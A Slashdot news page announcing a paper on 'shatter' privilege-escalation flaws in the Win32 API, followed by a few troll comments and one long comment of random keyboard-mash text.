×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Shattering Windows

timothy posted more than 11 years ago | from the fundamentalism dept.

Security 965

ChrisPaget writes: "I've just released a paper documenting and exploiting fundamental flaws in the Win32 API. Essentially, they allow you to take control of any window on your desktop, regardless of whether that window is running as you, localsystem, or anywhere in between. The technique has been discussed before, but AFAIK this is the first working exploit. Oh, did I mention it's unfixable?" You may want to read this CNET interview with Microsoft security head Scott Charney to learn even more about "trustworthy computing."

cancel ×
This is a preview of your comment

No Comment Title Entered

Anonymous Coward 1 minute ago

No Comment Entered

965 comments

FP (-1, Troll)

Anonymous Coward | more than 11 years ago | (#4020505)

Microsoft Standard First Post 1.0.

Re:FP (-1)

Anonymous Coward | more than 11 years ago | (#4020523)

THIS is INSIGHTFUL? you moderators should be SHOT!

Re:FP (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#4020530)

I agree. It was definitely more Informative than Insightful

HOLY SHIT ASDF (-1)

This_Is_ASDF (587337) | more than 11 years ago | (#4020509)

AsDADsS.FsfffD.FSDa F FsSFAds..SaS ..aF.fs F.SDDfDsddsAa.a asfD ssfafdsDASA ddsDd sSADFA.dDfS D.DddsSfadsASAaaf SSadAF.AaSaFfDFdsaAFAAaDfFdfaDDDS.ss.aF.FFafDaS.ds DD.DSdDsAFF ASASF FFfFDAd AaADfdDdsf . s.AD sddsSdadd.D fASs afsdDD.FsaDSasadAs.DsfsdaSFD .d A.sdF.SaS a. A SSf..Adsfa..sf AFADffF.AAfFSaffSsFDaAssafaa A d ... .FsSf.ff SsASsDdd.dFsd DFSfDDdfDdAfDSFsfS afAFAa..Fad .asdaaSf.aFfFDfsaaAafsFasD.safA. F S.d.afaffD. ..s. daSA.ASss fDdDff.d ..fFfd.A f. .AADf.aDdDd.aAa sD.fSdsdAf.sFFDaAdD.s.SfSF SSDdD saaS fDf DdsD.ASF.AAdsA..sSdsaAfds.DSFdaS ffS.a FAsd.DfFa.dfsFD sSfFAAasdS FASdAdS.sffsAdS. SaD fD.aaddS.afAAFDsDaSa sfad.Sa.fA fS fs.sa. ASdA.sDD ss.sfFD .fsfFD.fFF aaFSFdfFAaA.dSFAdFfSDFDdSSd.DafDdfAsDF. sS fA FDffAas ADaDF..f. S AAASaSdS..d.SAAfFSDfSadS.faFDSAd aaSFA . SFfdfSdd Da .SA S dAsSsfDDsdsaF.asf FAFddaSfSsaAD daaff.a ff d AfFssfsAFsff.DA .SDdsasfDDSf.sa ssFS f DDaD AfaDd..fadD..AdaFfA.SASfadaD DfasSDADFF.aDFafsafSDfddsAffFdFAFaFS.ffD fDsf.S dad.AD S .sdfsFsfF.d Asaasffaaaddd D.FA DFSaaS fDAFsa.fadS fFSDaFs.FsS FAasA.DaSdF.AadDdFsDD.D.FF.FaAdad fDfaasAFaaa DAfs dasfaa Fddad AF aF dA dDADAddFSSaa.sdS. FdFdDFSDDa. A ddf.SAD f. aSaddF fsss.aaadADS.s.FDSAss FADSS.s fSDS.DSa.aDSSFDDSSAfDS.DdS aDA asdFasAdaDsS .AfAssaaDaFsS s .FSddAdfdDf.asAaS.D.dF..F.fSfSa .SS s.Fa .aAAasSadFF .Ff .sDADSd dAAaAd.DDSFsdafdFD SfFa .D.DAsfDFa.AdsfdDffdfFSsSa.s.sAa. .SFd SAf D Ds a Fff SsAA SS.SDAS faadAfFAaASSDf aFaFsAfAss assFADFAsSa.sd .as fdAsfdSaS.SFaFSDA SaAAf.sAa .SD fa.SSa AFdFSFAf asDDFaF.DFf.DdAad FaSdSASSf sDsfaFd.asaFsSDFFdsfF.fA sddDD.s a DFDSFaFSs AdA.fFF fAaA.f SdAfdaaa.Fa.SDds F .F s.SFa.fSfF.AasDs.FdSDA.f..D.DfAa s. s fS ddDSsFAssfaS DAfFdDfAfD FaasS AFfsdd.AA SfsdaSAs. SFsaFsd.FFSFdad .FsAS SFSfAD d adDdasSs. ..S. dadfSF.dFSDfAfA.A.D..aAdsadaSfS. F aF Fd dDD..f.F aFaA.a.sFdFDSF F.FfDaDs.Sfas FSSSSsDFd.SA. fDFdFFDSa .sddd Sadf.FSFS.DdSFF.FFsSFa F d.S AA DaADS fAfDfdFfaFSS.Ds.fDsdfADadSaDfDsF DSF.Sf.S.DASaAdDSSfd fSa fSfD . d.fFd A fdd D sSsSFDa .S.AsSaddddDfSsaaDdfsaD FasFDf Dsf d S .F dADdD aASaa afdaFS..dfA FsaDd ..dfSSDD S.Sa..AsDfaFA f. SdfFSdDaDSD fsd DAAFaDDfDD.fdaDFdaDs SssdFFDsasaD.aDS.ffS .F S..DFas fA. fFAAdFfsFdDaAdSssDFFSDD .aadDsSda FddffdDd A sSFa FFfAd D DASADS.DafdfFaAdAsAssAF.ffSDFSdAsaaaFdFFDasAaFaDsA sff. FdfSa.aDadaaa aFss..f..sdS D.fdFDASa S.SF.SFA.FDaDFAFDFaAdFADdAD.sDf.S..FDDfSAdF aS .SSA.SdFFDADadd.sfFsfDSs .dasFSf daA. .s..f sdADdSas sAfADDffdaD DSFsF.fDdDaS Dad.sSfFdFA.daf DDsSAA SFsaAsF.sFsa.Df.sdSdSSAaA fs.FDDSFDfdA fADASA.AFffs..SsDs adAFasS.DaAsfd...SaS faA s AFAs..SD.aA.DSSFsF.d.A SdDSDsDsFSFaDFSS.SsFA.SSsDAASfadA.FdfFSsSSsf a.SFdS dfaAaDdFadfA faDsFFD ddsdsDdSfSaFFDaF..F dSFDFA.FfS DsA. daaaaFsDs..a.f DfsDFdAfsdsd.dS S.S.. a.AsaDdffdFDsSs.sds SaDfSAdd f.S SD Sd..SDFDAdSD DssFaSSSa.aAFDa SSaaSdSAd s dasaf a aSddDdDAs.aaSdad ...AafDa . F.aaFddASdsFsfaDDds ssfSfFSSfAdfDdSASFaddfd FdfFADdFFDDfAf.aFsSAAddsdASAFF..f DassasFDAfaSSsFdFA f.SFAsFAd.aDSaaDfdDaDsffDSf.S.A.FsDAfFaDDf SAAAF.f.SS sAaDSSFsSFdAfDfAAsFsDSFd DDfffDDF.S S A da.DDA SASAs .AdDsDaaSsadAFSfdafs.dSSD sfs .sssadsdADfAasAFSDs.adf.FafsADDDa.Fafs F.aAsfas..daaDf.DS .ffFafDsAsddsfdD A.S .a sD.aAASSsa sAd fADASdDAD AfFSf Dsf.FsD d.FAAddaDsASfdsaFFAS .dfdDddFdSdsSaF.dFFAA F.F.DS AfADS.AssAA.aSSdDDSDAsfd.daaaFDAs Aa afDDFDD fsfaDsDFSsaFfaad.SA fDaAaDdF dADfF.ss..Da.SSdFFsSAD.fD AAD .s.. .aAssDFdFSFaAF sAssa.ASS dAAsSaa.DfaSd AadDAdf.aDaaSDF as.sFs .sD.Ds dF .f.FfSaA a F afFaD .FfFDA .fFFFD.sS.Fa.d.f...D.SfaSSFffADdaDfFDdsff.Afd FfA.dSDASfsD.AdF.dFdaA saadAfSdf.DAs dFdFd...s.FADfA .F .fd . F.ffd.DfdAAfS DS dfDaaDaSSfFsf s FSFDAs.fFf. dA. sF sDD. aFDA a.dFaafssSdSSSFfDA SsDfF....FSfFFSSFFdssFfFSaFaDfSAAS.fAa .fDDsAS.fFaDFSAAFfAD.sf D . SFA.FAdfss.sfS.sf .FsD.fafdSA.dfDF DfSfS.dDdaF AfAA dA. a aAfAadf aSdfdsDs ..aS AssaSdSDS. s ASDsSA s.DaasssfDSsFDfDs. aFas DDf.AFAFDdF.S.ssF. DFD ..a..af FdD.aSSFAa.DSaFa.. FDd Fs FaSfSSA DDdAS.SDS D Sf.SdfasSSsFA Assss.fSDd s.sAAasSSA.DSDf.SFAfdDSAFsfAfF.S.dd dAs.ddSsasaFdSfSA.ffaSFAS.dAsSa fsAAffSA .fFAFSaD.ADSffd DFAfa.Sf sF.a .. FsSAasAFSasaDsDaf.FSAs Asa.aaASaS ADDdDfdFA.sfs d.a.sD dDAADsfDDFASAD sd SsFsAdA AADd.d.AD.SaFAaA SAaDD Aad.AD dds.SssDFaSSfDsfdDs.DaSdSDSD fsSDAFfSDAfASd.sdDa.fSaSdSsFD.dadfDA.ddF.DfSsd.fs. DF AafSsaSfdaSsAA DSAS.fD AdA D faDFSFF fs .daSF.dSS .Aa FDsDdDddSsaSsA. .a.sDDssA.DDSDfSASf. Fsd.f.aFFAa.SfFASssA.F Fsafa DSfsDA.SdsDFAD sFA.DAfFFfsF.S fffFSa FFF.DDS fafa.dA aA. S.dd DDA FsdF.fSFadsaAssaFAaS SdAFSdF Dd aSd..aFsfssaf af.s.S.ffFaASS aa SdSDAS.FDdFd..SadDSsfdsA..s .saDAFDa Fa d.Ssa dddaAAd.adFfFa a.s.SdA ..fSaAad. fAsD fs S. ddS sdFF.dFFFSFfFfffFa DSF.aSFD.afffDfdSAdSAFD.Sa sa FDaFSd D.f.dFfasDF.sA .dAD .. A.fADaFs..DFdAf .adas.SdsdaDfss.aASDD aS D FAFdSaSS SdF.SaDasasfDDdS Adad.a.. AsafDFFSa SDSa.DA.DFAffFfD.fDFD s.a.FFAF fDsfFa.D..fd fDsddadsDAsD sDsssDa aFAsSSds.S FaFsadd.DAS SfD.D .sDaSaFAf. sA sAA .FfFAdddDaf SfSff f.DdAF.ad DSADsfffFAsaFDSfAaFa ssfA.f sAaFfASA..aDSfDSsAaSAaFsddS.sa dD afdFafDaaf .dD dAd fFSaF.ddfsFf dd AsDADsS.FsfffD.FSDa F FsSFAds..SaS ..aF.fs F.SDDfDsddsAa.a asfD ssfafdsDASA ddsDd sSADFA.dDfS D.DddsSfadsASAaaf SSadAF.AaSaFfDFdsaAFAAaDfFdfaDDDS.ss.aF.FFafDaS.ds DD.DSdDsAFF ASASF FFfFDAd AaADfdDdsf . s.AD sddsSdadd.D fASs afsdDD.FsaDSasadAs.DsfsdaSFD .d A.sdF.SaS a. A SSf..Adsfa..sf AFADffF.AAfFSaffSsFDaAssafaa A d ... .FsSf.ff SsASsDdd.dFsd DFSfDDdfDdAfDSFsfS afAFAa..Fad .asdaaSf.aFfFDfsaaAafsFasD.safA. F S.d.afaffD. ..s. daSA.ASss fDdDff.d ..fFfd.A f. .AADf.aDdDd.aAa sD.fSdsdAf.sFFDaAdD.s.SfSF SSDdD saaS fDf DdsD.ASF.AAdsA..sSdsaAfds.DSFdaS ffS.a FAsd.DfFa.dfsFD sSfFAAasdS FASdAdS.sffsAdS. SaD fD.aaddS.afAAFDsDaSa sfad.Sa.fA fS fs.sa. ASdA.sDD ss.sfFD .fsfFD.fFF aaFSFdfFAaA.dSFAdFfSDFDdSSd.DafDdfAsDF. sS fA FDffAas ADaDF..f. S AAASaSdS..d.SAAfFSDfSadS.faFDSAd aaSFA . SFfdfSdd Da .SA S dAsSsfDDsdsaF.asf FAFddaSfSsaAD daaff.a ff d AfFssfsAFsff.DA .SDdsasfDDSf.sa ssFS f DDaD AfaDd..fadD..AdaFfA.SASfadaD DfasSDADFF.aDFafsafSDfddsAffFdFAFaFS.ffD fDsf.S dad.AD S .sdfsFsfF.d Asaasffaaaddd D.FA DFSaaS fDAFsa.fadS fFSDaFs.FsS FAasA.DaSdF.AadDdFsDD.D.FF.FaAdad fDfaasAFaaa DAfs dasfaa Fddad AF aF dA dDADAddFSSaa.sdS. FdFdDFSDDa. A ddf.SAD f. aSaddF fsss.aaadADS.s.FDSAss FADSS.s fSDS.DSa.aDSSFDDSSAfDS.DdS aDA asdFasAdaDsS .AfAssaaDaFsS s .FSddAdfdDf.asAaS.D.dF..F.fSfSa .SS s.Fa .aAAasSadFF .Ff .sDADSd dAAaAd.DDSFsdafdFD SfFa .D.DAsfDFa.AdsfdDffdfFSsSa.s.sAa. .SFd SAf D Ds a Fff SsAA SS.SDAS faadAfFAaASSDf aFaFsAfAss assFADFAsSa.sd .as fdAsfdSaS.SFaFSDA SaAAf.sAa .SD fa.SSa AFdFSFAf asDDFaF.DFf.DdAad FaSdSASSf sDsfaFd.asaFsSDFFdsfF.fA sddDD.s a DFDSFaFSs AdA.fFF fAaA.f SdAfdaaa.Fa.SDds F .F s.SFa.fSfF.AasDs.FdSDA.f..D.DfAa s. s fS ddDSsFAssfaS DAfFdDfAfD FaasS AFfsdd.AA SfsdaSAs. SFsaFsd.FFSFdad .FsAS SFSfAD d adDdasSs. ..S. dadfSF.dFSDfAfA.A.D..aAdsadaSfS. F aF Fd dDD..f.F aFaA.a.sFdFDSF F.FfDaDs.Sfas FSSSSsDFd.SA. fDFdFFDSa .sddd Sadf.FSFS.DdSFF.FFsSFa F d.S AA DaADS fAfDfdFfaFSS.Ds.fDsdfADadSaDfDsF DSF.Sf.S.DASaAdDSSfd fSa fSfD . d.fFd A fdd D sSsSFDa .S.AsSaddddDfSsaaDdfsaD FasFDf Dsf d S .F dADdD aASaa afdaFS..dfA FsaDd ..dfSSDD S.Sa..AsDfaFA f. SdfFSdDaDSD fsd DAAFaDDfDD.fdaDFdaDs SssdFFDsasaD.aDS.ffS .F S..DFas fA. fFAAdFfsFdDaAdSssDFFSDD .aadDsSda FddffdDd A sSFa FFfAd D DASADS.DafdfFaAdAsAssAF.ffSDFSdAsaaaFdFFDasAaFaDsA sff. FdfSa.aDadaaa aFss..f..sdS D.fdFDASa S.SF.SFA.FDaDFAFDFaAdFADdAD.sDf.S..FDDfSAdF aS .SSA.SdFFDADadd.sfFsfDSs .dasFSf daA. .s..f sdADdSas sAfADDffdaD DSFsF.fDdDaS Dad.sSfFdFA.daf DDsSAA SFsaAsF.sFsa.Df.sdSdSSAaA fs.FDDSFDfdA fADASA.AFffs..SsDs adAFasS.DaAsfd...SaS faA s AFAs..SD.aA.DSSFsF.d.A SdDSDsDsFSFaDFSS.SsFA.SSsDAASfadA.FdfFSsSSsf a.SFdS dfaAaDdFadfA faDsFFD ddsdsDdSfSaFFDaF..F dSFDFA.FfS DsA. daaaaFsDs..a.f DfsDFdAfsdsd.dS S.S.. a.AsaDdffdFDsSs.sds SaDfSAdd f.S SD Sd..SDFDAdSD DssFaSSSa.aAFDa SSaaSdSAd s dasaf a aSddDdDAs.aaSdad ...AafDa . F.aaFddASdsFsfaDDds ssfSfFSSfAdfDdSASFaddfd FdfFADdFFDDfAf.aFsSAAddsdASAFF..f DassasFDAfaSSsFdFA f.SFAsFAd.aDSaaDfdDaDsffDSf.S.A.FsDAfFaDDf SAAAF.f.SS sAaDSSFsSFdAfDfAAsFsDSFd DDfffDDF.S S A da.DDA SASAs .AdDsDaaSsadAFSfdafs.dSSD sfs .sssadsdADfAasAFSDs.adf.FafsADDDa.Fafs F.aAsfas..daaDf.DS .ffFafDsAsddsfdD A.S .a sD.aAASSsa sAd fADASdDAD AfFSf Dsf.FsD d.FAAddaDsASfdsaFFAS .dfdDddFdSdsSaF.dFFAA F.F.DS AfADS.AssAA.aSSdDDSDAsfd.daaaFDAs Aa afDDFDD fsfaDsDFSsaFfaad.SA fDaAaDdF dADfF.ss..Da.SSdFFsSAD.fD AAD .s.. .aAssDFdFSFaAF sAssa.ASS dAAsSaa.DfaSd AadDAdf.aDaaSDF as.sFs .sD.Ds dF .f.FfSaA a F afFaD .FfFDA .fFFFD.sS.Fa.d.f...D.SfaSSFffADdaDfFDdsff.Afd FfA.dSDASfsD.AdF.dFdaA saadAfSdf.DAs dFdFd...s.FADfA .F .fd . F.ffd.DfdAAfS DS dfDaaDaSSfFsf s FSFDAs.fFf. dA. sF sDD. aFDA a.dFaafssSdSSSFfDA SsDfF....FSfFFSSFFdssFfFSaFaDfSAAS.fAa .fDDsAS.fFaDFSAAFfAD.sf D . SFA.FAdfss.sfS.sf .FsD.fafdSA.dfDF DfSfS.dDdaF AfAA dA. a aAfAadf aSdfdsDs ..aS AssaSdSDS. s ASDsSA s.DaasssfDSsFDfDs. aFas DDf.AFAFDdF.S.ssF. DFD ..a..af FdD.aSSFAa.DSaFa.. FDd Fs FaSfSSA DDdAS.SDS D Sf.SdfasSSsFA Assss.fSDd s.sAAasSSA.DSDf.SFAfdDSAFsfAfF.S.dd dAs.ddSsasaFdSfSA.ffaSFAS.dAsSa fsAAffSA .fFAFSaD.ADSffd DFAfa.Sf sF.a .. FsSAasAFSasaDsDaf.FSAs Asa.aaASaS ADDdDfdFA.sfs d.a.sD dDAADsfDDFASAD sd SsFsAdA AADd.d.AD.SaFAaA SAaDD Aad.AD dds.SssDFaSSfDsfdDs.DaSdSDSD fsSDAFfSDAfASd.sdDa.fSaSdSsFD.dadfDA.ddF.DfSsd.fs. DF AafSsaSfdaSsAA DSAS.fD AdA D faDFSFF fs .daSF.dSS .Aa FDsDdDddSsaSsA. .a.sDDssA.DDSDfSASf. Fsd.f.aFFAa.SfFASssA.F Fsafa DSfsDA.SdsDFAD sFA.DAfFFfsF.S fffFSa FFF.DDS fafa.dA aA. S.dd DDA FsdF.fSFadsaAssaFAaS SdAFSdF Dd aSd..aFsfssaf af.s.S.ffFaASS aa SdSDAS.FDdFd..SadDSsfdsA..s .saDAFDa Fa d.Ssa dddaAAd.adFfFa a.s.SdA ..fSaAad. fAsD fs S. ddS sdFF.dFFFSFfFfffFa DSF.aSFD.afffDfdSAdSAFD.Sa sa FDaFSd D.f.dFfasDF.sA .dAD .. A.fADaFs..DFdAf .adas.SdsdaDfss.aASDD aS D FAFdSaSS SdF.SaDasasfDDdS Adad.a.. AsafDFFSa SDSa.DA.DFAffFfD.fDFD s.a.FFAF fDsfFa.D..fd fDsddadsDAsD sDsssDa aFAsSSds.S FaFsadd.DAS SfD.D .sDaSaFAf. sA sAA .FfFAdddDaf SfSff f.DdAF.ad DSADsfffFAsaFDSfAaFa ssfA.f sAaFfASA..aDSfDSsAaSAaFsddS.sa dD afdFafDaaf .dD dAd fFSaF.ddfsFf dd AsDADsS.FsfffD.FSDa F FsSFAds..SaS ..aF.fs F.SDDfDsddsAa.a asfD ssfafdsDASA ddsDd sSADFA.dDfS D.DddsSfadsASAaaf SSadAF.AaSaFfDFdsaAFAAaDfFdfaDDDS.ss.aF.FFafDaS.ds DD.DSdDsAFF ASASF FFfFDAd AaADfdDdsf . s.AD sddsSdadd.D fASs afsdDD.FsaDSasadAs.DsfsdaSFD .d A.sdF.SaS a. A SSf..Adsfa..sf AFADffF.AAfFSaffSsFDaAssafaa A d ... .FsSf.ff SsASsDdd.dFsd DFSfDDdfDdAfDSFsfS afAFAa..Fad .asdaaSf.aFfFDfsaaAafsFasD.safA. F S.d.afaffD. ..s. daSA.ASss fDdDff.d ..fFfd.A f. .AADf.aDdDd.aAa sD.fSdsdAf.sFFDaAdD.s.SfSF SSDdD saaS fDf DdsD.ASF.AAdsA..sSdsaAfds.DSFdaS ffS.a FAsd.DfFa.dfsFD sSfFAAasdS FASdAdS.sffsAdS. SaD fD.aaddS.afAAFDsDaSa sfad.Sa.fA fS fs.sa. ASdA.sDD ss.sfFD .fsfFD.fFF aaFSFdfFAaA.dSFAdFfSDFDdSSd.DafDdfAsDF. sS fA FDffAas ADaDF..f. S AAASaSdS..d.SAAfFSDfSadS.faFDSAd aaSFA . SFfdfSdd Da .SA S dAsSsfDDsdsaF.asf FAFddaSfSsaAD daaff.a ff d AfFssfsAFsff.DA .SDdsasfDDSf.sa ssFS f DDaD AfaDd..fadD..AdaFfA.SASfadaD DfasSDADFF.aDFafsafSDfddsAffFdFAFaFS.ffD fDsf.S dad.AD S .sdfsFsfF.d Asaasffaaaddd D.FA DFSaaS fDAFsa.fadS fFSDaFs.FsS FAasA.DaSdF.AadDdFsDD.D.FF.FaAdad fDfaasAFaaa DAfs dasfaa Fddad AF aF dA dDADAddFSSaa.sdS. FdFdDFSDDa. A ddf.SAD f. aSaddF fsss.aaadADS.s.FDSAss FADSS.s fSDS.DSa.aDSSFDDSSAfDS.DdS aDA asdFasAdaDsS .AfAssaaDaFsS s .FSddAdfdDf.asAaS.D.dF..F.fSfSa .SS s.Fa .aAAasSadFF .Ff .sDADSd dAAaAd.DDSFsdafdFD SfFa .D.DAsfDFa.AdsfdDffdfFSsSa.s.sAa. .SFd SAf D Ds a Fff SsAA SS.SDAS faadAfFAaASSDf aFaFsAfAss assFADFAsSa.sd .as fdAsfdSaS.SFaFSDA SaAAf.sAa .SD fa.SSa AFdFSFAf asDDFaF.DFf.DdAad FaSdSASSf sDsfaFd.asaFsSDFFdsfF.fA sddDD.s a DFDSFaFSs AdA.fFF fAaA.f SdAfdaaa.Fa.SDds F .F s.SFa.fSfF.AasDs.FdSDA.f..D.DfAa s. s fS ddDSsFAssfaS DAfFdDfAfD FaasS AFfsfSDAfASd.sdDa.fSaSdSsFD.dadfDA.ddF.DfSsd.fs. DF AafSsaSfdaSsAA DSAS.fD AdA D faDFSFF fs .daSF.dSS .Aa FDsDdDddSsaSsA. .a.sDDssA.DDSDfSASf. Fsd.f.aFFAa.SfFASssA.F Fsafa DSfsDA.SdsDFAD sFA.DAfFFfsF.S fffFSa FFF.DDS fafa.dA aA. S.dd DDA FsdF.fSFadsaAssaFAaS SdAFSdF Dd aSd..aFsfssaf af.s.S.ffFaASS aa SdSDAS.FDdFd..SadDSsfdsA..s .saDAFDa Fa d.Ssa dddaAAd.adFfFa a.s.SdA ..fSaAad. fAsD fs S. ddS sdFF.dFFFSFfFfffFa DSF.aSFD.afffDfdSAdSAFD.Sa sa FDaFSd D.f.dFfasDF.sA .dAD .. A.fADaFs..DFdAf .adas.SdsdaDfss.aASDD aS D FAFdSaSS SdF.SaDasasfDDdS Adad.a.. AsafDFFSa SDSa.DA.DFAffFfD.fDFD s.a.FFAF fDsfFa.D..fd fDsddadsDAsD sDsssDa aFAsSSds.S FaFsadd.DAS SfD.D .sDaSaFAf. sA sAA .FfFAdddDaf SfSff f.DdAF.ad DSADsfffFAsaFDSfAaFa ssfA.f sAaFfASA..aDSfDSsAaSAaFsddS.sa dD afdFafDaaf .dD dAd fFSaF.ddfsFf dd AsDADsS.FsfffD.FSDa F FsSFAds..SaS ..aF.fs F.SDDfDsddsAa.a asfD ssfafdsDASA ddsDd sSADFA.dDfS D.DddsSfadsASAaaf SSadAF.AaSaFfDFdsaAFAAaDfFdfaDDDS.ss.aF.FFafDaS.ds DD.DSdDsAFF ASASF FFfFDAd AaADfdDdsf . s.AD sddsSdadd.D fASs afsdDD.FsaDSasadAs.DsfsdaSFD .d A.sdF.SaS a. A SSf..Adsfa..sf AFADffF.AAfFSaffSsFDaAssafaa A d ... .FsSf.ff SsASsDdd.dFsd DFSfDDdfDdAfDSFsfS afAFAa..Fad .asdaaSf.aFfFDfsaaAafsFasD.safA. F S.d.afaffD. ..s. daSA.ASss fDdDff.d ..fFfd.A f. .AADf.aDdDd.aAa sD.fSdsdAf.sFFDaAdD.s.SfSF SSDdD saaS fDf DdsD.ASF.AAdsA..sSdsaAfds.DSFdaS ffS.a FAsd.DfFa.dfsFD sSfFAAasdS FASdAdS.sffsAdS. SaD fD.aaddS.afAAFDsDaSa sfad.Sa.fA fS fs.sa. ASdA.sDD ss.sfFD .fsfFD.fFF aaFSFdfFAaA.dSFAdFfSDFDdSSd.DafDdfAsDF. sS fA FDffAas ADaDF..f. S AAASaSdS..d.SAAfFSDfSadS.faFDSAd aaSFA . SFfdfSdd Da .SA S dAsSsfDDsdsaF.asf FAFddaSfSsaAD daaff.a ff d AfFssfsAFsff.DA .SDdsasfDDSf.sa ssFS f DDaD AfaDd..fadD..AdaFfA.SASfadaD DfasSDADFF.aDFafsafSDfddsAffFdFAFaFS.ffD fDsf.S dad.AD S .sdfsFsfF.d Asaasffaaaddd D.FA DFSaaS fDAFsa.fadS fFSDaFs.FsS FAasA.DaSdF.AadDdFsDD.D.FF.FaAdad fDfaasAFaaa DAfs dasfaa Fddad AF aF dA dDADAddFSSaa.sdS. FdFdDFSDDa. A ddf.SAD f. aSaddF fsss.aaadADS.s.FDSAss FADSS.s fSDS.DSa.aDSSFDDSSAfDS.DdS aDA asdFasAdaDsS .AfAssaaDaFsS s .FSddAdfdDf.asAaS.D.dF..F.fSfSa .SS s.Fa .aAAasSadFF .Ff .sDADSd dAAaAd.DDSFsdafdFD SfFa .D.DAsfDFa.AdsfdDffdfFSsSa.s.sAa. .SFd SAf D Ds a Fff SsAA SS.SDAS faadAfFAaASSDf aFaFsAfAss assFADFAsSa.sd .as fdAsfdSaS.SFaFSDA SaAAf.sAa .SD fa.SSa AFdFSFAf asDDFaF.DFf.DdAad FaSdSASSf sDsfaFd.asaFsSDFFdsfF.fA sddDD.s a DFDSFaFSs AdA.fFF fAaA.f SdAfdaaa.Fa.SDds F .F s.SFa.fSfF.AasDs.FdSDA.f..D.DfAa s. s fS ddDSsFAssfaS DAfFdDfAfD FaasS AFfsdd.AA SfsdaSAs. SFsaFsd.FFSFdad .FsAS SFSfAD d adDdasSs. ..S. dadfSF.dFSDfAfA.A.D..aAdsadaSfS. F aF Fd dDD..f.F aFaA.a.sFdFDSF F.FfDaDs.Sfas FSSSSsDFd.SA. fDFdFFDSa .sddd Sadf.FSFS.DdSFF.FFsSFa F d.S AA DaADS fAfDfdFfaFSS.Ds.fDsdfADadSaDfDsF DSF.Sf.S.DASaAdDSSfd fSa fSfD . d.fFd A fdd D sSsSFDa .S.AsSaddddDfSsaaDdfsaD FasFDf Dsf d S .F dADdD aASaa afdaFS..dfA FsaDd ..dfSSDD S.Sa..AsDfaFA f. SdfFSdDaDSD fsd DAAFaDDfDD.fdaDFdaDs SssdFFDsasaD.aDS.ffS .F S..DFas fA. fFAAdFfsFdDaAdSssDFFSDD .aadDsSda FddffdDd A sSFa FFfAd D DASADS.DafdfFaAdAsAssAF.ffSDFSdAsaaaFdFFDasAaFaDsA sff. FdfSa.aDadaaa aFss..f..sdS D.fdFDASa S.SF.SFA.FDaDFAFDFaAdFADdAD.sDf.S..FDDfSAdF aS .SSA.SdFFDADadd.sfFsfDSs .dasFSf daA. .s..f sdADdSas sAfADDffdaD DSFsF.fDdDaS Dad.sSfFdFA.daf DDsSAA SFsaAsF.sFsa.Df.sdSdSSAaA fs.FDDSFDfdA fADASA.AFffs..SsDs adAFasS.DaAsfd...SaS faA s AFAs..SD.aA.DSSFsF.d.A SdDSDsDsFSFaDFSS.SsFA.SSsDAASfadA.FdfFSsSSsf a.SFdS dfaAaDdFadfA faDsFFD ddsdsDdSfSaFFDaF..F dSFDFA.FfS DsA. daaaaFsDs..a.f DfsDFdAfsdsd.dS S.S.. a.AsaDdffdFDsSs.sds SaDfSAdd f.S SD Sd..SDFDAdSD DssFaSSSa.aAFDa SSaaSdSAd s dasaf a aSddDdDAs.aaSdad ...AafDa . F.aaFddASdsFsfaDDds ssfSfFSSfAdfDdSASFaddfd FdfFADdFFDDfAf.aFsSAAddsdASAFF..f DassasFDAfaSSsFdFA f.SFAsFAd.aDSaaDfdDaDsffDSf.S.A.FsDAfFaDDf SAAAF.f.SS sAaDSSFsSFdAfDfAAsFsDSFd DDfffDDF.S S A da.DDA SASAs .AdDsDaaSsadAFSfdafs.dSSD sfs .sssadsdADfAasAFSDs.adf.FafsADDDa.Fafs F.aAsfas..daaDf.DS .ffFafDsAsddsfdD A.S .a sD.aAASSsa sAd fADASdDAD AfFSf Dsf.FsD d.FAAddaDsASfdsaFFAS .dfdDddFdSdsSaF.dFFAA F.F.DS AfADS.AssAA.aSSdDDSDAsfd.daaaFDAs Aa afDDFDD fsfaDsDFSsaFfaad.SA fDaAaDdF dADfF.ss..Da.SSdFFsSAD.fD AAD .s.. .aAssDFdFSFaAF sAssa.ASS dAAsSaa.DfaSd AadDAdf.aDaaSDF as.sFs .sD.Ds dF .f.FfSaA a F afFaD .FfFDA .fFFFD.sS.Fa.d.f...D.SfaSSFffADdaDfFDdsff.Afd FfA.dSDASfsD.AdF.dFdaA saadAfSdf.DAs dFdFd...s.FADfA .F .fd . F.ffd.DfdAAfS DS dfDaaDaSSfFsf s FSFDAs.fFf. dA. sF sDD. aFDA a.dFaafssSdSSSFfDA SsDfF....FSfFFSSFFdssFfFSaFaDfSAAS.fAa .fDDsAS.fFaDFSAAFfAD.sf D . SFA.FAdfss.sfS.sf .FsD.fafdSA.dfDF DfSfS.dDdaF AfAA dA. a aAfAadf aSdfdsDs ..aS AssaSdSDS. s ASDsSA s.DaasssfDSsFDfDs. aFas DDf.AFAFDdF.S.ssF. DFD ..a..af FdD.aSSFAa.DSaFa.. FDd Fs FaSfSSA DDdAS.SDS D Sf.SdfasSSsFA Assss.fSDd s.sAAasSSA.DSDf.SFAfdDSAFsfAfF.S.dd dAs.ddSsasaFdSfSA.ffaSFAS.dAsSa fsAAffSA .fFAFSaD.ADSffd DFAfa.Sf sF.a .. FsSAasAFSasaDsDaf.FSAs Asa.aaASaS ADDdDfdFA.sfs d.a.sD dDAADsfDDFASAD sd SsFsAdA AADd.d.AD.SaFAaA SAaDD Aad.AD dds.SssDFaSSfDsfdDs.DaSdSDSD fsSDAFfFssS .dDSAdsA ad D dSf.aSf.SFD.SFa daFsFA .aadfS..sDda.sAFDfAFsSsAaffds.Ff.aAdSS DfSa .AfFsaDdFFF.sff s. f F.dd.Ds.ddSAsDDadSFdAsAaDasDSSfSAS.SAdDD S DfdDDaD.AaDAF.FDA dssadaSSDAsAaF. FF AFsSDFSSFAf DSDF.D DDsFds.fDDdf d as FDdfdSsF s.sDDaFDfdFF.AaAd . ASf FFSAsDsdF sAAaAadfFfssFfDa.fSdD sSs f Df.FsSaSSdsSF .S.DS.d ss. Dd.dDFSFFD .AdfSafsaaa.F.sff . FaSDF A.f.Fasf. DdS. A. F .daaS.sAS.sdaDfaDD FsfaDdAdfsdFaSFafDsaSffaAafSaadFfA.a.S 